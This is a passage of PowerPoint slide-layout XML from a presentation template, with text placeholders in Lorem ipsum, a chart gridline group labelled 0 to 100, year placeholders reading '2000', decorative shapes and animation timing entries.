              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44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4622088" y="5151591"/>
            <a:ext cx="2941464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6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45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4622093" y="5461324"/>
            <a:ext cx="2941463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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49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8295917" y="5151591"/>
            <a:ext cx="2941464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6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50" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="24" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8295922" y="5461324"/>
            <a:ext cx="2941463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08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Fusce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>diam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>tortor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mattis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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dapibus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vitae, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>euismod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>purusaecen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="603251" y="1767848"/>
            <a:ext cx="10972800" cy="2833612"/>
            <a:chOff x="452438" y="1473206"/>
            <a:chExt cx="8229600" cy="2361343"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="TextBox 1"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="452438" y="1473206"/>
              <a:ext cx="34769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44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5B9BD5"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Lato Regular"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Lato Regular"/>
                </a:rPr>
                <a:t>100</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1440" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5B9BD5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Lato Regular"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="4" name="Straight Connector 3"/>
            <p:cNvCxnSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="906408" y="1645572"/>
              <a:ext cx="7775630" cy="13900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln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 userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="452438" y="3572939"/>
              <a:ext cx="20823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44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5B9BD5"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Lato Regular"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Lato Regular"/>
                </a:rPr>
                <a:t>0</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1440" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5B9BD5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Lato Regular"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="25" name="Straight Connector 24"/>
            <p:cNvCxnSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="906408" y="3745305"/>
              <a:ext cx="7775630" cy="13900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln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 userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="452438" y="2540006"/>
              <a:ext cx="27796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44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5B9BD5"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Lato Regular"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Lato Regular"/>
                </a:rPr>
                <a:t>50</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1440" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5B9BD5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Lato Regular"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="27" name="Straight Connector 26"/>
            <p:cNvCxnSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="906408" y="2712372"/>
              <a:ext cx="7775630" cy="13900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln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/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="452438" y="2032006"/>
              <a:ext cx="27796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44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5B9BD5"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Lato Regular"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Lato Regular"/>
                </a:rPr>
                <a:t>75</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1440" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5B9BD5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Lato Regular"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="31" name="Straight Connector 30"/>
            <p:cNvCxnSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="906408" y="2204372"/>
              <a:ext cx="7775630" cy="13900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln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/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="452438" y="3064940"/>
              <a:ext cx="27796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44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5B9BD5"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Lato Regular"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="Lato Regular"/>
                </a:rPr>
                <a:t>25</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="1440" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="5B9BD5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Lato Regular"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Lato Regular"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="33" name="Straight Connector 32"/>
            <p:cNvCxnSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="906408" y="3237306"/>
              <a:ext cx="7775630" cy="13900"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln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9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column with da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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331655" y="2145650"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0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6738048" y="1527880"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline="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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331655" y="1898830"/>
            <a:ext cx="2360789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66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="2145650"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/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67" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621655" y="1527880"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline="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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="68" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="1898830"/>
            <a:ext cx="2360789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69" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331655" y="3762176"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/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70" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6738048" y="3144408"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline="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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="71" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331655" y="3515357"/>
            <a:ext cx="2360789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24" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="72" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="3762176"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="73" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621655" y="3144408"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline="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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="74" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="3515357"/>
            <a:ext cx="2360789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27" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="75" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331655" y="5344250"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/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76" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6738048" y="4746930"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline="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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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77" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6331655" y="5097430"/>
            <a:ext cx="2360789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30" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="78" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="5344250"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/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79" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621655" y="4746930"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline="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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="80" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="5097430"/>
            <a:ext cx="2360789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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rounded Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 34"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="58928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Rounded Rectangle 35"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="65151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7" name="Oval 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6331655" y="1568515"/>
            <a:ext cx="288000" cy="2592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Oval 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9215261" y="1568515"/>
            <a:ext cx="288000" cy="2592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Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6331655" y="3174886"/>
            <a:ext cx="288000" cy="25920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Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9215261" y="3174886"/>
            <a:ext cx="288000" cy="2592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Oval 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6331655" y="4762168"/>
            <a:ext cx="288000" cy="259200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2" name="Oval 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="9215261" y="4762168"/>
            <a:ext cx="288000" cy="259200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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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4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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="9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2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2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2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1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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2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2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2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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="10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2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2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2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2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2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9" dur="2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2500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="1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3" dur="2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2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5" dur="2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3000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="12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9" dur="2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2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1" dur="2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5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9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22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25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2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31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</p:bld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Right column with da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03251" y="324582"/>
            <a:ext cx="10972800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smtClean="0"/>
              <a:t>Text </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES_tradnl" dirty="0" err="1" smtClean="0"/>
              <a:t>slide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03251" y="827103"/>
            <a:ext cx="10972800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64" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="2145650"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0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1009644" y="1527880"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean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65" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="1898830"/>
            <a:ext cx="2360789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66" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="2145650"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/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67" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621655" y="1527880"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="68" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="1898830"/>
            <a:ext cx="2360789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69" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="3762176"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/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70" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009644" y="3144408"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="71" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="3515357"/>
            <a:ext cx="2360789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24" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="72" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="3762176"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="73" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9621655" y="3144408"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="74" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215262" y="3515357"/>
            <a:ext cx="2360789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27" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="75" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="5344250"/>
            <a:ext cx="2360789" cy="841393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endParaRPr lang="en-US" dirty="0" smtClean="0"/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76" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1009644" y="4746930"/>
            <a:ext cx="1967997" cy="3453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160" b="1" baseline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smtClean="0"/>
              <a:t>2000</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES_tradnl" dirty="0" smtClean="0"/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77" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="603251" y="5097430"/>
            <a:ext cx="2360789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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="33" name="Group 32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="101309" y="385540"/>
            <a:ext cx="383999" cy="342172"/>
            <a:chOff x="5270500" y="1460500"/>
            <a:chExt cx="1701800" cy="2705100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Rounded Rectangle 33"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="52705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Rounded Rectangle 34"/>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
